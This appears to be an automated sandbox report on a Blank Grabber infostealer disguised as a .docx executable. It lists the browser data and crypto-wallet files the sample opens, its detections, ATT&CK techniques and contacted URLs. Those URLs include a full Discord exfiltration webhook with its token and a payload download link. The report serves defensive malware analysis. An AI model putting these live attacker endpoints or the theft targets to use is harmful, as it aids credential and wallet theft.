Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match

File source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2023955880.0000025C3C158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2047803547.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chost.exe PID: 4336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI43362\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	241 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	11 Process Injection	4 Disable or Modify Tools	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	122 Command and Scripting Interpreter	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	11 Deobfuscate/Decode Files or Information	Security Account Manager	59 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	121 Obfuscated Files or Information	NTDS	361 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	161 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Masquerading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	161 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Cooperative Agreement0000800380.docx.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
Cooperative Agreement0000800380.docx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\_MEI43362\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\python312.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\chost.exe	53%	ReversingLabs	Win64.Trojan.Generic

Name	IP	Active	Malicious	Reputation
discord.com	162.159.138.232	true	false	high
github.com	20.233.83.145	true	false	high
ip-api.com	208.95.112.1	true	true
objects.githubusercontent.com	185.199.109.133	true	false
blank-7uov3.in	unknown	unknown	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG	false
https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/	true

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	chost.exe, 00000011.00000003.2045074168.0000016E180BD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2045543203.0000016E172E6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2045412697.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2045671881.0000016E172EE000.00000004.00000020.00020000.00000000.sdmp	false
https://www.avito.ru/	chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_	chost.exe, 00000011.00000002.2372423656.0000016E16FB0000.00000004.00001000.00020000.00000000.sdmp	false
https://api.telegram.org/bot	chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.microsoft	powershell.exe, 0000004F.00000002.2286588093.0000014E184B0000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ctrip.com/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 0000000C.00000003.1975407820.00000266524A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.00000266524F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.0000026652507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.00000266524E8000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	chost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy?	chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmp	false
https://www.leboncoin.fr/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc2388#section-4.4	chost.exe, 00000011.00000002.2372629701.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2063239108.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370358863.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	chost.exe, 00000011.00000002.2372251589.0000016E16D70000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2032110974.0000016E1723F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2032110974.0000016E1725F000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 0000000C.00000003.1975407820.000002665251A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.000002665240E000.00000004.00000800.00020000.00000000.sdmp	false
https://weibo.com/	chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmp	false
https://api.anonfiles.com/upload	chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	false
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs	chost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.msn.com	chost.exe, 00000011.00000002.2376962492.0000016E189EC000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	chost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digi	chost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	false
https://peps.python.org/pep-0205/	chost.exe, 00000011.00000003.2032563848.0000016E17227000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372528563.0000016E170B0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.reddit.com/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000019.00000002.2104672027.0000025739CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004F.00000002.2251813408.0000014E00297000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.ca/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000000C.00000003.1975407820.00000266524C2000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	chost.exe, 00000011.00000002.2372116588.0000016E16C70000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	chost.exe, 00000011.00000002.2372116588.0000016E16C70000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ebay.co.uk/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000019.00000002.2104672027.0000025739ED9000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ebay.de/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	chost.exe, 00000011.00000002.2372116588.0000016E16CEC000.00000004.00001000.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 0000004F.00000002.2251813408.0000014E00916000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	chost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmp	false
https://www.amazon.com/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	chost.exe, 00000011.00000003.2370358863.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048172933.0000016E1795E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372629701.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2060721109.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	chost.exe, 00000011.00000003.2070118152.0000016E176E2000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 0000000C.00000002.2916774796.0000026652200000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	chost.exe, 00000011.00000002.2372423656.0000016E16FB0000.00000004.00001000.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E177E0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E17889000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	chost.exe, 00000011.00000002.2372423656.0000016E16FB0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224958579.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2202547693.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://allegro.pl/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g	chost.exe, 00000011.00000003.2369453832.0000016E176AF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2371220047.0000016E17EE4000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373443919.0000016E176B5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370287171.0000016E176FF000.00000004.00000020.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	chost.exe, 00000011.00000002.2373248659.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E17961000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	chost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmp	false
https://www.python.org/psf/license/	chost.exe, 00000011.00000002.2383172319.00007FFDF7956000.00000040.00000001.01000000.0000000F.sdmp	false
https://www.bbc.co.uk/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://bugzilla.mo	chost.exe, 00000011.00000002.2376962492.0000016E1899C000.00000004.00001000.00020000.00000000.sdmp	false
https://cdn.discordapp.com/attachments/1267176354575683617/1314299600026468442/Blank-user.rar?ex=67	chost.exe, 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/importlib_metadata/wiki/Development-Methodology	chost.exe, 00000011.00000002.2376637980.0000016E18400000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2069822813.0000016E1767E000.00000004.00000020.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000019.00000002.2104672027.0000025739ED9000.00000004.00000800.00020000.00000000.sdmp	false
https://google.com/mail	chost.exe, 00000011.00000003.2053657547.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/specifications/entry-points/	chost.exe, 00000011.00000002.2376637980.0000016E18424000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	chost.exe, 00000011.00000003.2368767650.0000016E177BB000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/psf/license/)	chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	chost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmp	false
